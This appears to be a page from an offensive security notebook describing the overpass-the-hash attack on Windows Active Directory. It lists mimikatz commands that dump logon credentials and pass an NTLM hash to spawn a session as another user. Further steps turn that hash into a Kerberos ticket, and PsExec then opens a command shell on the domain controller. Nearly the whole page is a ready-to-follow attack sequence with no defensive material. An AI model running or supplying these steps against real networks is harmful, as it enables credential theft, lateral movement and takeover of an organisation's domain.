OverPass the hash

Overpass the hash

With overpass the hash, we can “over” abuse a NTLM user hash to gain a full Kerberos Ticket Granting Ticket (TGT) or service ticket, which grants us access to another machine or service as that user.

  1. Transfer all 3 mimikatz file to run mimikatz.exe mimikatz.exe

  2. Give privilege access privilege::debug

  3. sekurlsa::logonpasswords Skip this step, if you already have hash

  4. sekurlsa::pth /user:<user> /domain:<domain> /ntlm:<ntlm hash> /run:PowerShell.exe At this point, we have a new PowerShell session that allows us to execute commands as <user>.

  5. exit mimikatz

  6. klist No Kerberos tickets have been cached, but this is expected since <user> has not performed an interactive login.

  7. net use \\<dc_machine_name> However, let’s generate a TGT by authenticating to a network share on the domain controller or another service with net use:

  8. klist

We have now converted our NTLM hash into a Kerberos TGT, allowing us to use any tools that rely on Kerberos authentication (as opposed to NTLM) such as the official PsExec application from Microsoft

  1. .\PsExec.exe \\<dc_machine_name> cmd.exe

  2. ipconfig to check

successfully reused the Kerberos TGT to launch a command shell on the domain controller.

PreviousPass the hashNextSilver Ticket Attack

Last updated